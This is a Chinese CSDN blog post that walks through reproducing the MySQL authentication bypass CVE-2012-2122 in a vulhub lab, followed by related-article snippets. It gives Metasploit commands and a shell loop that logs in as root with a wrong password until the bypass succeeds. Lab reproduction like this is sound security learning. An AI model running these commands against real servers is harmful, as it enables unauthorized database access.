vulhub-mysql漏洞复现

最新推荐文章于 2024-10-08 23:06:47 发布

简月

最新推荐文章于 2024-10-08 23:06:47 发布

阅读量58

点赞数

文章标签： docker mysql

本文链接：https://blog.csdn.net/m0_62373986/article/details/135020759

版权

本文详细描述了如何在KaliLinux上使用Metasploit框架针对CentOS7系统中的CVE-2012-2122MySQL身份验证绕过漏洞进行攻击，包括设置靶机、执行exploit和获取数据库凭证的过程。

摘要由CSDN通过智能技术生成

靶机：centos7

攻击机：kali

进入mysql环境
cd vulhub
ls
cd mysql
cd CVE-2012-2122

在这里插入图片描述
攻击机：kali

进入：msfconsole
查找对应的漏洞：search CVE-2012-2122
使用：use 0

在这里插入图片描述

查看配置选项，yes为必填选项：show options/options
设置靶机ip:set rhost XXX
查看是否配置成功：show options

在这里插入图片描述

运行：run/exploit

在这里插入图片描述

获取数据库账户密码：for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.17.180(靶机IP) -P3306 ; done
验证：show databases;

在这里插入图片描述
参考链接：[MySql身份认证绕过漏洞(CVE-2012-2122)-CSDN博客]

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

简月

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Vulhub-Mysql 身份认证绕过漏洞（CVE-2012-2122）

weixin_45540609的博客

09-08

887

一、漏洞简介当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。二、漏洞范围 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.

【vulhub】MySql身份认证绕过漏洞复现(CVE-2012-2122)

errorr0

08-09

1746

CVE-2012-2122

参与评论您还未登录，请先登录后发表或查看评论

mysql5.5.5a下载_|mysql.4.0.5a.txt... - 信息安全漏洞门户 VULHUB

weixin_30590615的博客

02-18

The MySQL database versions <= 3.23.53a and <= 4.0.5a contains local and remote vulnerabilities allowing remote attackers to bypass the MySQL password check and execute arbitrary code with the p...

复现vulhub mysql身份认证绕过漏洞

AmeV_ll的博客

03-14

150

当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。

vulhub复现MYSQL-cve-2012-2122-身份认证漏洞及利用

carrot11223的博客

12-23

494

mysql身份认证漏洞复现

vulhub-thinkphp漏洞复现

qq_51922767的博客

09-14

2549

vulhub-thinkphp漏洞复现

vulhub靶场mysql类型CVE-2012-2122漏洞复现

qq_58873970的博客

07-24

650

当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

CVE-2012-2122-mysql未授权访问漏洞复现-vulhub

c0529的博客

06-12

679

简单来说，除了配置上的问题以外，是密码的验证出现了漏洞，导致尝试次数多了之后直接可以登入使用：kali+vulhub。

[ vulhub漏洞复现篇 ] vulhub 漏洞集合（含漏洞复现文章连接）

热门推荐

qq_51577576的博客

09-21

1万+

介绍：Vulhub是一个面向大众的开源漏洞靶场，无需docker知识，简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划：这里记录了 vulhub 所有的漏洞，本专栏也会将这些漏洞全部复现，欢迎持续订阅我也会不定期再中间更新复现文章链接目的：以复现 vulhub 漏洞为路径，展示不同的渗透思路及手法，同类漏洞我会尽量用多种渗透思路进行复现，不仅仅是提高个人能力，也是想再 CSDN 这个平台认识更多的安全爱好者

Centos7漏洞库vulhub-master.zip

03-01

1. **Web应用漏洞**：Vulhub中可能包括了如SQL注入、XSS跨站脚本、CSRF跨站请求伪造、文件包含漏洞等经典Web漏洞的复现。例如，你可以通过学习如何利用这些漏洞，理解它们的工作原理，从而提高你的安全防护能力。 2...

Mysql CVE-2012-2122（vulhub）漏洞复现

MDSEC的博客

08-23

352

[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341)

qq_51577576的博客

02-21

1604

[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341) Drupal是使用PHP语言编写的开源内容管理框架（CMF），它由内容管理系统（CMS）和PHP开发框架（Framework）共同构成，在GPL2.0及更新协议下发布。Drupal在某些情况下，通过文件模块或者子系统上传恶意文件触发XSS漏洞。

[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798

qq_51577576的博客

09-02

2004

[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。Grafana存在任意文件读取漏洞未授权的攻击者利用该漏洞，能够获取服务器敏感文件。...

【Docker从入门到进阶】03.进阶应用

10-03

1758

创建自定义网络这样创建的网络默认使用桥接模式。查看网络将容器连接到自定义网络连接现有容器到网络断开容器与网络的连接多服务配置Docker Compose 文件允许您通过 service 块定义多个服务。每个服务定义了一个 Docker 容器，使用这些容器共同协作以完成一个复杂的应用。网络与卷管理支持定义自定义网络，方便应用内不同服务之间的通信。通过卷的使用实现数据的持久化和共享。在中可以明确声明各服务间的依赖关系。环境变量和配置管理可以在 Compose 文件中嵌入环境变量，或使用。

k8s 中的金丝雀发布(灰度发布)

weixin_68398469的博客

10-06

1294

金丝雀发布（Canary Release）也称为灰度发布，是一种软件发布策略。主要目的是在将新版本的软件全面推广到生产环境之前，先在一小部分用户或服务器上进行测试和验证，以降低因新版本引入重大问题而对整个系统造成的影响。是一种Pod的发布方式。金丝雀发布采取先添加、再删除的方式，保证Pod的总量不低于期望值。并且在更新部分Pod后，暂停更新，当确认新Pod版本运行正常后再进行其他版本的Pod的更新。

Windows 通过 Docker 安装 GitLab

m0_58648890的博客

10-05

1174

image: 'gitlab/gitlab-ee:latest' # 使用 GitLab 企业版镜像，或将 'gitlab-ee' 改为 'gitlab-ce' 使用社区版。- './config:/etc/gitlab' # GitLab 配置文件存储路径。- './logs:/var/log/gitlab' # GitLab 日志文件存储路径。- './data:/var/opt/gitlab' # GitLab 数据存储路径。- '80:80' # 映射 HTTP 端口。

IDEA连接Docker（远程）

L0g1c的博客

10-06

714

首先确保已经安装了CentOS 7操作系统。

docker compose入门5—创建一个3副本的应用